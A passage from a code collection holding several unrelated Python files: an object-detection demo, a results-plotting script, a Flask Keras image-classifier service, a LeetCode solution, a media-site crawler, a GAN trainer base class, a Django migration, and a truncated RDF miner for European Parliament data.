yy1)\n hbb_inter = w * h\n hbb_ovr = hbb_inter / (areas[i] + areas[order[1:]] - hbb_inter)\n h_inds = np.where(hbb_ovr > 0)[0]\n tmp_order = order[h_inds + 1]\n for j in range(tmp_order.size):\n iou = polyiou.iou_poly(polys[i], polys[tmp_order[j]])\n hbb_ovr[h_inds[j]] = iou\n\n try:\n if math.isnan(ovr[0]):\n pdb.set_trace()\n except:\n pass\n inds = np.where(hbb_ovr <= thresh)[0]\n order = order[inds + 1]\n return keep\n\n\nclass DetectorModel():\n def __init__(self,\n config_file,\n checkpoint_file):\n # init RoITransformer\n self.config_file = config_file\n self.checkpoint_file = checkpoint_file\n self.cfg = Config.fromfile(self.config_file)\n self.data_test = self.cfg.data['test']\n self.dataset = get_dataset(self.data_test)\n # self.classnames = [\"Boeing737\", \"Boeing777\", \"Boeing747\", \"Boeing787\", \"A320\", \"A220\", \"A330\",\n # \"A350\", \"A321\",\n # \"C919\", \"ARJ21\", \"other-airplane\", \"Passenger Ship\", \"motorboat\", \"fishing boat\", \"tugboat\",\n # \"engineering ship\", \"liquid cargo ship\", \"Dry Cargo Ship\", \"warship\", \"other-ship\", \"small car\", \"bus\",\n # \"cargo truck\",\n # \"dump truck\", \"van\", \"trailer\", \"tractor\", \"truck tractor\", \"excavator\", \"other-vehicle\",\n # \"baseball field\",\n # \"basketball court\", \"football field\", \"tennis court\", \"roundabout\", \"intersection\", \"bridge\"\n # ]\n self.classnames = [\"airplane\", \"ship\", \"vehicle\", \"court\", \"road\"]\n self.model = init_detector(config_file, checkpoint_file, device='cuda:0')\n\n def inference_single(self, imagname, slide_size, chip_size):\n img = mmcv.imread(imagname)\n height, width, channel = img.shape\n slide_h, slide_w = slide_size\n hn, wn = chip_size\n # TODO: check the corner case\n # import pdb; pdb.set_trace()\n # total_detections = [np.zeros((0, 9)) for _ in range(len(self.classnames))]\n total_detections = inference_detector(self.model, img)\n # for cls_id, name in enumerate(self.classnames):\n # total_detections[cls_id] = chip_detections[cls_id]\n\n # for i in tqdm(range(int(width / slide_w + 1))):\n # for j in range(int(height / slide_h) + 1):\n # subimg = np.zeros((hn, wn, channel))\n # # print('i: ', i, 'j: ', j)\n # chip = img[j * slide_h:j * slide_h + hn, i * slide_w:i * slide_w + wn, :3]\n # subimg[:chip.shape[0], :chip.shape[1], :] = chip\n #\n # chip_detections = inference_detector(self.model, subimg)\n #\n # # print('result: ', result)\n # for cls_id, name in enumerate(self.classnames):\n # chip_detections[cls_id][:, :8][:, ::2] = chip_detections[cls_id][:, :8][:, ::2] + i * slide_w\n # chip_detections[cls_id][:, :8][:, 1::2] = chip_detections[cls_id][:, :8][:, 1::2] + j * slide_h\n # # import pdb;pdb.set_trace()\n # try:\n # total_detections[cls_id] = np.concatenate((total_detections[cls_id], chip_detections[cls_id]))\n # except:\n # import pdb;\n # pdb.set_trace()\n # nms\n for i in range(len(self.classnames)):\n keep = py_cpu_nms_poly_fast_np(total_detections[i], 0.1)\n # total_detections[i] = total_detections[i][keep]\n return total_detections\n\n def inference_single_vis(self, srcpath, dstpath, slide_size, chip_size):\n detections = self.inference_single(srcpath, slide_size, chip_size)\n img = draw_poly_detections(srcpath, detections, self.classnames, scale=1, threshold=0.2,\n colormap=dota15_colormap)\n cv2.imshow(\"aa\", img)\n cv2.waitKey(0)\n\n\nif __name__ == '__main__':\n model = DetectorModel(\n r\"configs/fair1m/faster_rcnn_obb_r50_fpn_1x_fair1m_few_shot.py\",\n r\"work_dirs/faster_rcnn_obb_r50_fpn_1x_fair1m_5classes_few_shot/epoch_35.pth\")\n\n img_dir = \"/mnt/data/datasets/gaofen/FAIR1M2.0/fair1_1000/val1000/images\"\n out_dir = './output'\n img_names = os.listdir(img_dir)\n for img_name in img_names:\n print(img_name)\n img_path = os.path.join(img_dir, img_name)\n out_path = os.path.join(out_dir, img_name)\n model.inference_single_vis(img_path, out_path, (1000, 1000), (1500, 1500))\n","repo_name":"hakobtt/rotated_detection_few_shot","sub_path":"demo_large_image.py","file_name":"demo_large_image.py","file_ext":"py","file_size_in_byte":6259,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"39311916229","text":"import numpy as np\nimport pickle\n\n\nnp.set_printoptions(linewidth=np.inf)\n\n\nwith open('simulation.pickle', 'rb') as f:\n results = pickle.load(f)\n\n\ndata = []\nfor results_ in results:\n x = [list(result.values()) for result in results_]\n x = np.rec.array(x, dtype=[\n ('algorithm', object),\n ('id', object),\n ('calculation_time', float),\n ('drive_time', float),\n ('n_nodes', int),\n ('path', list),\n ('diverge_policy', list),\n ('iterations', int)])\n\n data.append(x)\n\n\ndata = np.array(data)\n\n\nmdp = data[:, np.where(data[0]['algorithm'] == 'MDP')]\nbrtdp = data[:, np.where(data[0]['algorithm'] == 'BRTDP')]\ndstar = data[:, np.where(data[0]['algorithm'] == 'DStar_Lite')]\n\n\nprint(mdp.shape)\nprint(brtdp.shape)\nprint(dstar.shape)\n\n\ndef get_data(algorithm, arr, type_, style=''):\n arr = np.sort(arr, order='n_nodes')\n data = np.percentile(arr[:, 0][type_], [25, 50, 75], axis=0)\n\n if style:\n style = ',' + style\n\n for i, item in enumerate(data.T):\n print(\"\\\\boxplot{%d}{%f}{%f}{%f}\" % (i+1, *item))\n print(f\"\\\\addplot[color=black,mark=none{style}] coordinates {{\")\n for i, item in enumerate(data.T):\n print(\"(%d,%f)\" % (i+1, item[1]))\n print(f\"}};\\n\\\\addlegendentry{{{algorithm}}}\")\n print('')\n\n\nprint(\"===== CALC\")\nget_data('Value Iteration', mdp, 'calculation_time', 'dotted,thick')\nget_data('BRTDP', brtdp, 'calculation_time')\nget_data('D* Lite', dstar, 'calculation_time', 'dashed')\n\nprint(\"===== DRIVE\")\nget_data('Value Iteration', mdp, 'drive_time', 'dotted,thick')\nget_data('BRTDP', brtdp, 'drive_time')\nget_data('D* Lite', dstar, 'drive_time', 'dashed')\n","repo_name":"instance01/osmnx-mdp","sub_path":"osmnx_mdp/extract_for_pgfplots.py","file_name":"extract_for_pgfplots.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"27507929918","text":"# https://towardsdatascience.com/deploying-keras-deep-learning-models-with-flask-5da4181436a2\n# https://docs.microsoft.com/en-us/azure/app-service/containers/quickstart-python\n\nimport json\nimport io\nimport numpy as np\nimport h5py\nfrom keras.models import load_model\nimport os.path\nfrom flask import Flask, request\nimport flask\nfrom PIL import Image\nimport tensorflow as tf\nimport base64\n\napp = Flask(__name__)\n\n# 4MB Max image size limit\napp.config['MAX_CONTENT_LENGTH'] = 4 * 1024 * 1024\n\n# class_indices = ['axes', 'boots', 'carabiners', 'crampons', 'gloves', 'hardshell_jackets',\n# 'harnesses', 'helmets', 'insulated_jackets', 'pulleys', 'rope', 'tents']\n\nclass_indices = ['Apple Granny Smith', 'Apple Red 1', 'Avocado', 'Banana', 'Kiwi', 'Orange', 'Passion Fruit', 'Tamarillo', 'Tomato 2', 'Tomato 4']\n\n\nmodel = None\nglobal graph\ngraph = tf.get_default_graph()\n\n\ndef load_myModel():\n # load the pre-trained Keras model (here we are using a model\n # pre-trained on ImageNet and provided by Keras, but you can\n # substitute in your own networks just as easily)\n global model\n model = load_model('./fruit-model.hdf5')\n\n\ndef scale(image, max_size=(100, 100)):\n from PIL import Image\n x, y = image.size\n size = max(x, y)\n new_img = Image.new('RGB', (size, size), \"white\")\n new_img.paste(image, (int((size - x) / 2), int((size - y) / 2)))\n return new_img.resize(max_size, Image.BICUBIC)\n\n\n@app.route('/')\ndef hello_world():\n # Just here as a simple ping test\n return 'Hello, World!'\n\n\n@app.route('/')\ndef index():\n return 'CustomVision.ai model host harness'\n\n\n@app.route('/image', methods=['POST'])\ndef predict_image_handler():\n try:\n print('data received')\n imageData = None\n if ('imageData' in request.files):\n imageData = request.files['imageData']\n else:\n imageData = io.BytesIO(request.get_data())\n\n img = Image.open(imageData)\n img = scale(img)\n\n data = np.asarray(img).reshape((1, 100, 100, 3))\n data = data * (1./255)\n\n # with graph.as_default():\n # result = model.predict_classes(data)\n\n with graph.as_default():\n predictions = list(model.predict_proba(data))\n\n if len(predictions) == 0:\n return 'no results'\n\n # print(str(result))\n # return 'completed'\n\n # results = []\n\n # results.append({'Tag': class_indices[result[0]], 'Probability': 1})\n # str(result)\n # return result\n\n # rounded = [float(np.round(x,8)) for x in predictions]\n\n # print(str(rounded))\n print(predictions)\n # print(predictions[:,39])\n\n result = []\n idx = 0\n for p in predictions:\n for i in p:\n print('idx =' + str(idx))\n print(i)\n truncated_probablity = np.float64(round(i,8))\n if (truncated_probablity > 1e-8):\n result.append({'Tag': class_indices[idx], 'Probability': i })\n idx += 1\n\n sortResponse = sorted(result, key=lambda k: k['Probability'], reverse=True)\n print(str(sortResponse))\n\n return str(sortResponse)\n\n # return \"{\\\"result\\\":\\\"%s\\\"}\" % class_indices[result[0]]\n # return 'hello world'\n # return json.dumps(results)\n except Exception as e:\n print('EXCEPTION:', str(e))\n return 'Error processing image', 500\n\n\n# Like the CustomVision.ai Prediction service /url route handles url's\n# in the body of hte request of the form:\n# { 'Url': ''}\n@app.route('/url', methods=['POST'])\ndef predict_url_handler():\n try:\n image_url = json.loads(request.get_data())['Url']\n # results = predict_url(image_url)\n return \"{\\\"result\\\":\\\"hello world\\\"}\"\n except Exception as e:\n print('EXCEPTION:', str(e))\n return 'Error processing image'\n\n\nif __name__ == '__main__':\n load_myModel()\n print('starting server')\n app.run(host='0.0.0.0', port=8000)\n\n","repo_name":"AzureAdvocateBit/NDC2018-Azure-IoT-Edge-Image-Analysis-with-Bing-Text-to-Speech-1","sub_path":"modules/KerasClassifierService/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74181124260","text":"class Solution:\n def arraySign(self, nums: List[int]) -> int:\n product = 1\n negatives = 0\n for num in nums:\n if num == 0:\n return 0\n elif num < 0:\n negatives += 1\n product *= num\n return -1 if negatives % 2 == 1 else 1","repo_name":"AyushAgnihotri2025/CP-Solutions","sub_path":"LeetCode/Python3/Easy/1822. Sign of the Product of an Array/1822-sign-of-the-product-of-an-array.py","file_name":"1822-sign-of-the-product-of-an-array.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"37080117379","text":"from yarl import URL\n\nfrom ..base_functions.base_functions import log, logger\nfrom ..base_functions.data_classes import DomainItem\nfrom ..client.client import Session\n\n\nclass SaintCrawler:\n def __init__(self, *, include_id=False, quiet: bool):\n self.include_id = include_id\n self.quiet = quiet\n\n async def fetch(self, session: Session, url: URL):\n domain_obj = DomainItem(url.host, {})\n await log(\"Starting scrape of \" + str(url), quiet=self.quiet)\n\n try:\n soup = await session.get_BS4(url)\n link = URL(soup.select_one('video[id=main-video] source').get('src'))\n await domain_obj.add_to_album(\"Saint Loose Files\", link, url)\n\n except Exception as e:\n logger.debug(\"Error encountered while handling %s\", str(url), exc_info=True)\n await log(\"Error scraping \" + str(url), quiet=self.quiet)\n logger.debug(e)\n\n await log(\"Finished scrape of \" + str(url), quiet=self.quiet)\n\n return domain_obj\n","repo_name":"kkrish2593/CyberDropDownloader","sub_path":"cyberdrop_dl/crawlers/Saint_Spider.py","file_name":"Saint_Spider.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"21641865749","text":"import os\nfrom abc import abstractmethod\nfrom pathlib import Path\n\nimport torch\nfrom numpy import inf\n\nfrom logger import TensorboardWriter\n\n\nclass BaseTrainer:\n \"\"\"\n Base class for all trainers\n \"\"\"\n\n def __init__(self, generator, discriminator, criterions, metric_ftns, optimizerG, optimizerD, config):\n self.config = config\n self.logger = config.get_logger('trainer', config['trainer']['verbosity'])\n\n # setup GPU device if available, move model into configured device\n self.device, device_ids = self._prepare_device(config['n_gpu'])\n self.generator = generator.to(self.device)\n self.discriminator = discriminator.to(self.device)\n if len(device_ids) > 1:\n self.generator = torch.nn.DataParallel(generator, device_ids=device_ids)\n self.discriminator = torch.nn.DataParallel(discriminator, device_ids=device_ids)\n\n self.criterions = criterions\n self.metric_ftns = metric_ftns\n self.optimizerG = optimizerG\n self.optimizerD = optimizerD\n\n cfg_trainer = config['trainer']\n self.epochs = cfg_trainer['epochs']\n self.save_period = cfg_trainer['save_period']\n self.monitor = cfg_trainer.get('monitor', 'off')\n\n # configuration to monitor model performance and save best\n if self.monitor == 'off':\n self.mnt_mode = 'off'\n # self.mnt_best = 0\n else:\n self.mnt_mode, self.mnt_metric = self.monitor.split()\n assert self.mnt_mode in ['min', 'max']\n\n # self.mnt_best = inf if self.mnt_mode == 'min' else -inf\n self.early_stop = cfg_trainer.get('early_stop', inf)\n\n self.start_epoch = 1\n\n self.checkpoint_dir = config.save_dir\n\n # initialize checpoint\n os.mknod(self.checkpoint_dir / \"checkpoint\")\n\n # setup visualization writer instance \n self.writer_gen = TensorboardWriter(os.path.join(config.log_dir, \"generator\"), self.logger,\n cfg_trainer['tensorboard'])\n\n self.writer_dis = TensorboardWriter(os.path.join(config.log_dir, \"discrimiantor\"), self.logger,\n cfg_trainer['tensorboard'])\n # self.writer_dreal = TensorboardWriter(os.path.join(config.log_dir, \"d_real\"), self.logger,\n # cfg_trainer['tensorboard'])\n # self.writer_dfake = TensorboardWriter(os.path.join(config.log_dir, \"d_fake\"), self.logger,\n # cfg_trainer['tensorboard'])\n\n if config.resume is not None:\n self._resume_checkpoint(config.resume)\n\n @abstractmethod\n def _train_epoch(self, epoch):\n \"\"\"\n Training logic for an epoch\n\n :param epoch: Current epoch number\n \"\"\"\n raise NotImplementedError\n\n def train(self):\n \"\"\"\n Full training logic\n \"\"\"\n not_improved_count = 0\n for epoch in range(self.start_epoch, self.epochs + 1):\n result = self._train_epoch(epoch)\n\n # save logged informations into log dict\n log = {'epoch': epoch}\n log.update(result)\n\n # print logged informations to the screen\n for key, value in log.items():\n self.logger.info(' {:15s}: {}'.format(str(key), value))\n\n # evaluate model performance according to configured metric, save best checkpoint as model_best\n best = False\n if self.mnt_mode != 'off':\n try:\n # check whether model performance improved or not, according to specified metric(mnt_metric)\n improved = (self.mnt_mode == 'min' and log[self.mnt_metric] <= self.mnt_best) or \\\n (self.mnt_mode == 'max' and log[self.mnt_metric] >= self.mnt_best)\n except KeyError:\n self.logger.warning(\"Warning: Metric '{}' is not found. \"\n \"Model performance monitoring is disabled.\".format(self.mnt_metric))\n self.mnt_mode = 'off'\n improved = False\n\n if improved:\n self.mnt_best = log[self.mnt_metric]\n not_improved_count = 0\n best = True\n else:\n not_improved_count += 1\n\n if not_improved_count > self.early_stop:\n self.logger.info(\"Validation performance didn\\'t improve for {} epochs. \"\n \"Training stops.\".format(self.early_stop))\n break\n\n if epoch % self.save_period == 0:\n self._save_checkpoint(epoch, save_best=best)\n\n def _prepare_device(self, n_gpu_use):\n \"\"\"\n setup GPU device if available, move model into configured device\n \"\"\"\n n_gpu = torch.cuda.device_count()\n if n_gpu_use > 0 and n_gpu == 0:\n self.logger.warning(\"Warning: There\\'s no GPU available on this machine,\"\n \"training will be performed on CPU.\")\n n_gpu_use = 0\n if n_gpu_use > n_gpu:\n self.logger.warning(\"Warning: The number of GPU\\'s configured to use is {}, but only {} are available \"\n \"on this machine.\".format(n_gpu_use, n_gpu))\n n_gpu_use = n_gpu\n device = torch.device('cuda:0' if n_gpu_use > 0 else 'cpu')\n list_ids = list(range(n_gpu_use))\n return device, list_ids\n\n def _save_checkpoint(self, epoch, save_best=False):\n \"\"\"\n Saving checkpoints\n\n :param epoch: current epoch number\n :param log: logging information of the epoch\n :param save_best: if True, rename the saved checkpoint to 'model_best.pth'\n \"\"\"\n netG = type(self.generator).__name__\n stateG = {\n 'arch': netG,\n 'epoch': epoch,\n 'state_dict': self.generator.state_dict(),\n 'optimizer': self.optimizerG.state_dict(),\n 'config': self.config\n }\n filenameG = str(self.checkpoint_dir / 'checkpoint-netG-epoch{}.pth'.format(epoch))\n torch.save(stateG, filenameG)\n\n netD = type(self.discriminator).__name__\n stateD = {\n 'arch': netD,\n 'epoch': epoch,\n 'state_dict': self.discriminator.state_dict(),\n 'optimizer': self.optimizerD.state_dict(),\n 'config': self.config\n }\n filenameD = str(self.checkpoint_dir / 'checkpoint-netD-epoch{}.pth'.format(epoch))\n torch.save(stateD, filenameD)\n\n self.logger.info(\"Saving checkpoint: {} {}...\".format(filenameG, filenameD))\n\n # write model info to checkpoint\n with open(self.checkpoint_dir / \"checkpoint\", \"w\") as f:\n line = \"{}\\n{}\\n\".format(filenameG, filenameD)\n f.write(line)\n\n if save_best:\n best_pathG = str(self.checkpoint_dir / 'model_bestG.pth')\n best_pathD = str(self.checkpoint_dir / 'model_bestD.pth')\n torch.save(stateG, best_pathG)\n torch.save(stateD, best_pathD)\n self.logger.info(\"Saving current best: model_best.pth ...\")\n\n def _resume_checkpoint(self, resume_path):\n \"\"\"\n Resume from saved checkpoints\n\n :param resume_path: Checkpoint path to be resumed\n \"\"\"\n resume_path = Path(resume_path)\n with open(resume_path / \"checkpoint\", \"r\") as f:\n lines = f.readlines()\n lines = list(map(str.strip, lines))\n if len(lines) != 2:\n self.logger.warning(\"Warning: Checkpoint is empty. Load model weight failed.\")\n return\n resume_pathG, resume_pathD = lines\n\n self.logger.info(\"Loading checkpoint: {} and {} ...\".format(resume_pathG, resume_pathD))\n\n checkpointG = torch.load(resume_pathG)\n checkpointD = torch.load(resume_pathD)\n self.start_epoch = checkpointG['epoch'] + 1\n # self.mnt_best = checkpoint['monitor_best']\n\n # load architecture params from checkpoint.\n if checkpointG['config']['netG'] != self.config['netG'] or checkpointD['config']['netD'] != self.config['netD']:\n self.logger.warning(\"Warning: Architecture configuration given in config file is different from that of \"\n \"checkpoint. This may yield an exception while state_dict is being loaded.\")\n self.generator.load_state_dict(checkpointG['state_dict'])\n self.discriminator.load_state_dict(checkpointD['state_dict'])\n # load optimizer state from checkpoint only when optimizer type is not changed.\n if checkpointG['config']['optimizerG']['type'] != self.config['optimizerG']['type'] or \\\n checkpointD['config']['optimizerD']['type'] != self.config['optimizerD']['type']:\n self.logger.warning(\"Warning: Optimizer type given in config file is different from that of checkpoint. \"\n \"Optimizer parameters not being resumed.\")\n else:\n self.optimizerG.load_state_dict(checkpointG['optimizer'])\n self.optimizerD.load_state_dict(checkpointD['optimizer'])\n\n self.logger.info(\"Checkpoint loaded. Resume training from epoch {}\".format(self.start_epoch))\n","repo_name":"zacharyclam/FusionCGAN","sub_path":"base/base_trainer.py","file_name":"base_trainer.py","file_ext":"py","file_size_in_byte":9412,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"24354491459","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('staff', '0001_initial'),\n ('ophasebase', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Settings',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('student_registration_enabled', models.BooleanField(verbose_name='Klausuranmeldung aktiv', default=False)),\n ],\n options={\n 'verbose_name': 'Einstellungen',\n 'verbose_name_plural': 'Einstellungen',\n },\n ),\n migrations.CreateModel(\n name='Student',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('prename', models.CharField(verbose_name='Vorname', max_length=50)),\n ('name', models.CharField(verbose_name='Name', max_length=50)),\n ('email', models.EmailField(verbose_name='E-Mail-Adresse', max_length=254, blank=True)),\n ('want_exam', models.BooleanField(verbose_name='Klausur mitschreiben?', default=False)),\n ('want_newsletter', models.BooleanField(verbose_name='Newsletter abonnieren?', default=False)),\n ('created_at', models.DateTimeField(auto_now_add=True)),\n ('updated_at', models.DateTimeField(auto_now=True)),\n ('ophase', models.ForeignKey(to='ophasebase.Ophase', on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'Erstie',\n 'verbose_name_plural': 'Ersties',\n 'ordering': ['tutor_group', 'name', 'prename'],\n },\n ),\n migrations.CreateModel(\n name='TutorGroup',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(verbose_name='Gruppenname', max_length=50)),\n ('group_category', models.ForeignKey(verbose_name='Gruppenkategorie', to='staff.GroupCategory', on_delete=models.CASCADE)),\n ('ophase', models.ForeignKey(to='ophasebase.Ophase', on_delete=models.CASCADE)),\n ('tutors', models.ManyToManyField(verbose_name='Tutoren', to='staff.Person')),\n ],\n options={\n 'verbose_name': 'Kleingruppe',\n 'verbose_name_plural': 'Kleingruppen',\n 'ordering': ['group_category', 'name'],\n },\n ),\n migrations.AddField(\n model_name='student',\n name='tutor_group',\n field=models.ForeignKey(verbose_name='Kleingruppe', to='students.TutorGroup', on_delete=models.CASCADE),\n ),\n ]\n","repo_name":"d120/pyophase","sub_path":"students/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"} +{"seq_id":"10324791081","text":"import re\nfrom datetime import datetime\nimport urllib.parse as urlparse\nfrom iribaker import to_iri\nfrom rdflib import URIRef, Literal\nimport logging\nfrom timeit import default_timer as timer\nimport multiprocessing\nimport json\nimport os\nimport spotlight\n\nimport io_handler as io\nimport constants as c\nimport formatting as fmt\nfrom sparql_server import SparqlServer\nfrom dataset_generator import DatasetGenerator\nfrom utils import get_elapsed_seconds\n\n# TODO () Look into addN() function for adding multiple triples in one go\n# https://rdflib.readthedocs.io/en/stable/_modules/rdflib/graph.html#ConjunctiveGraph.addN\n\n\nclass Miner(object):\n \"\"\"Miner module.\"\"\"\n\n def __init__(self, manager, debug=False):\n self.debug = debug\n\n # External URIs (DBPedia etc)\n self.mep_ext_uris = manager.dict()\n self.party_ext_uris = manager.dict()\n self.places_ext_uris = manager.dict()\n self.committees_ext_uris = manager.dict()\n\n # Internal URIs\n self.dict_mep = manager.dict()\n self.dict_parties = manager.dict()\n self.dict_dossier = manager.dict()\n self.dict_committees = manager.dict()\n self.dict_docs = manager.dict()\n\n self.list_activities = manager.list()\n self.list_procedures = manager.list()\n self.list_sub_procedures = manager.list()\n self.list_doc_types = manager.list()\n\n self.sparql_endpoint = SparqlServer(c.SPARQL_ENDPOINT)\n\n self.total_triples = 0\n\n logging.basicConfig(\n filename=c.MAIN_LOG,\n level=logging.INFO,\n format=\"[%(asctime)s] [%(levelname)s] %(message)s\",\n datefmt=\"%d/%m/%Y %I:%M:%S %p\",\n )\n\n def start(self, num_threads, mep_limit, dossier_limit, vote_limit):\n \"\"\"Starts the miner class with the given configuration.\"\"\"\n\n loaded_dict = io.load_json(c.EXTERNAL_MEP_URIS)\n if loaded_dict is not None:\n self.mep_ext_uris.update(loaded_dict)\n\n loaded_dict = io.load_json(c.EXTERNAL_PARTY_URIS)\n if loaded_dict is not None:\n self.party_ext_uris.update(loaded_dict)\n\n loaded_dict = io.load_json(c.EXTERNAL_PLACES_URIS)\n if loaded_dict is not None:\n self.places_ext_uris.update(loaded_dict)\n\n loaded_dict = io.load_json(c.EXTERNAL_COMMITTEE_URIS)\n if loaded_dict is not None:\n self.committees_ext_uris.update(loaded_dict)\n\n # TEMP\n loaded_dict = io.load_json(c.JSON_DIR + \"subprocedures.json\")\n if loaded_dict is not None:\n self.list_procedures.extend(loaded_dict)\n\n loaded_dict = io.load_json(c.JSON_DIR + \"procedures.json\")\n if loaded_dict is not None:\n self.list_procedures.extend(loaded_dict)\n\n loaded_dict = io.load_json(c.JSON_DIR + \"activities.json\")\n if loaded_dict is not None:\n self.list_activities.extend(loaded_dict)\n\n loaded_dict = io.load_json(c.JSON_DIR + \"doc_types.json\")\n if loaded_dict is not None:\n self.list_doc_types.extend(loaded_dict)\n\n results = self.convert_meps(c.DIR_MEPS, num_threads, mep_limit)\n if results:\n total_mep_triples, total_meps, time = results\n print(\n fmt.OK_SYMBOL,\n \"Mined %i MEPs (%i triples). Took %f seconds\\n\"\n % (total_meps, total_mep_triples, time),\n )\n else:\n return False\n\n io.save_dict_to_json(c.EXTERNAL_MEP_URIS, self.mep_ext_uris)\n io.save_dict_to_json(c.EXTERNAL_PARTY_URIS, self.party_ext_uris)\n io.save_dict_to_json(c.EXTERNAL_COMMITTEE_URIS, self.committees_ext_uris)\n\n results = self.convert_dossiers(c.DIR_DOSSIERS, num_threads, dossier_limit)\n if results:\n total_dossier_triples, total_dossiers, time = results\n print(\n fmt.OK_SYMBOL,\n \"Mined %i dossiers (%i triples). Took %f seconds\\n\"\n % (total_dossiers, total_dossier_triples, time),\n )\n else:\n return False\n\n io.save_dict_to_json(c.EXTERNAL_PLACES_URIS, self.places_ext_uris)\n\n io.save_list_to_json(c.JSON_DIR + \"activities.json\", self.list_activities)\n io.save_list_to_json(c.JSON_DIR + \"procedures.json\", self.list_procedures)\n io.save_list_to_json(c.JSON_DIR + \"subprocedures.json\", self.list_sub_procedures)\n io.save_list_to_json(c.JSON_DIR + \"doc_types.json\", self.list_doc_types)\n\n results = self.convert_votes(c.DIR_VOTES, num_threads, vote_limit)\n if results:\n total_vote_triples, total_votes, time = results\n print(\n fmt.OK_SYMBOL,\n \"Mined %i related votes (%i triples). Took %f seconds\\n\"\n % (total_votes, total_vote_triples, time),\n )\n else:\n return False\n\n self.total_triples = total_mep_triples + total_dossier_triples + total_vote_triples\n\n # def mepid_to_profile_iri(id):\n # return URIRef(to_iri('http://www.europarl.europa.eu/meps/en/' + str(id)\n # + '/_history.html'))\n\n @staticmethod\n def mep_to_lpv(id_):\n id_string = str(id_)\n\n return URIRef(to_iri(c.lp + \"EUmember_\" + id_string))\n\n # Needs changing?\n @staticmethod\n def id_to_iri(id_, prefix=None):\n id_string = str(id_)\n if prefix:\n id_string = prefix + \"_\" + id_string\n\n return URIRef(to_iri(c.ont + id_string))\n\n @staticmethod\n def format_name_string(input_string):\n input_string = re.sub(\"\\(.+?\\)\", \"\", input_string)\n input_string = input_string.lower().title().strip()\n input_string = re.sub(\"\\s+\", \"_\", input_string)\n return str(urlparse.quote_plus(input_string.replace(\".\", \"_\")))\n\n @staticmethod\n def get_dbpedia_lookup_uris(search_string, search_class=None, max_results=5):\n query = (\n \"MaxHits=\" + str(max_results) + \"&QueryString=\" + urlparse.quote_plus(search_string)\n )\n if search_class:\n query += \"&QueryClass=\" + urlparse.quote_plus(search_class)\n\n resp = io.get_request(c.URL_DBPEDIA_LOOKUP + query)\n\n uris = []\n if resp:\n for result in resp[\"results\"]:\n uri = result[\"uri\"]\n if uri not in uris:\n uris.append(uri)\n elif resp is False:\n return False\n\n return uris\n\n @staticmethod\n def get_dbpedia_spotlight_uris(search_string, filters):\n uris = []\n\n try:\n annotations = spotlight.annotate(\n c.URL_DBPEDIA_SPOTLIGHT, search_string, filters=filters\n )\n\n for result in annotations:\n uri = result[\"URI\"]\n if uri not in uris:\n uris.append(uri)\n except spotlight.SpotlightException:\n pass\n\n return uris\n\n @staticmethod\n def fetch_uris_from_name(name, keywords=\"\", search_class=None, max_results=5):\n uris = []\n dbpedia_uris = Miner.get_dbpedia_lookup_uris(\n name + \" \" + keywords, search_class=search_class, max_results=max_results\n )\n\n if dbpedia_uris:\n uris = dbpedia_uris\n elif (\n dbpedia_uris is False\n ): # Failed, but uris might still be available, so don't generate one\n return uris\n else: # Nothing found with spotlight, so just create a uri from the name string\n formatted = Miner.format_name_string(name)\n iri = to_iri(c.dbr + formatted)\n uris.append(iri)\n\n return uris\n\n def key_exists(self, key, uri_dict):\n key = str(key)\n if key in uri_dict:\n return True\n else:\n return False\n\n def uris_exist(self, key, uri_dict):\n key = str(key)\n if self.key_exists(\n key, uri_dict\n ): # Check if the key exists in the dictionary and has a list\n if uri_dict[key]: # Check if the list is empty\n return True\n\n return False\n\n def add_uris(self, uris, key, uri_dict):\n key = str(key)\n if not self.key_exists(key, uri_dict):\n uri_dict[key] = []\n\n if type(uris) is not list: # If it's a single uri (string), convert it to a list anyway\n uris = [uris]\n\n \"\"\"\n for uri in uris:\n if uri not in uri_dict[key][selected_list]:\n uri_dict[key][selected_list].append(uri)\n \"\"\"\n\n uri_dict[key] = uris\n\n def get_uris(self, key, uri_dict):\n key = str(key)\n if self.uris_exist(key, uri_dict):\n return uri_dict[key]\n else:\n return []\n\n def process_mep(self, index):\n triples = set()\n\n mep = io.load_json(os.path.join(c.DIR_MEPS, str(index) + \".json\"), verbose=False)\n\n date_now = datetime.now().date()\n\n # Get raw values\n mep_id = int(mep[\"UserID\"])\n # user_id = str(mep['_id'])\n full_name = Literal(str(mep[\"Name\"][\"full\"].lower().title().strip()), datatype=c.STRING)\n\n profile_url = Literal(str(mep[\"meta\"][\"url\"]), datatype=c.URI)\n mep_uri = Miner.id_to_iri(mep_id, prefix=\"mep\")\n\n triples.add((mep_uri, c.TYPE, c.MEP))\n\n # If no URIs exists, fetch any existing ones and add them to our dictionary\n if not self.uris_exist(mep_id, self.mep_ext_uris):\n mep_ext_uris = Miner.fetch_uris_from_name(\n full_name, keywords=\"politician\", max_results=1\n ) # For some reason results are best without search_class='person'\n self.add_uris(mep_ext_uris, mep_id, self.mep_ext_uris)\n\n # Add all external URIs as the same induvidual\n for ext_uri in self.get_uris(mep_id, self.mep_ext_uris):\n triples.add((mep_uri, c.SAME_AS, 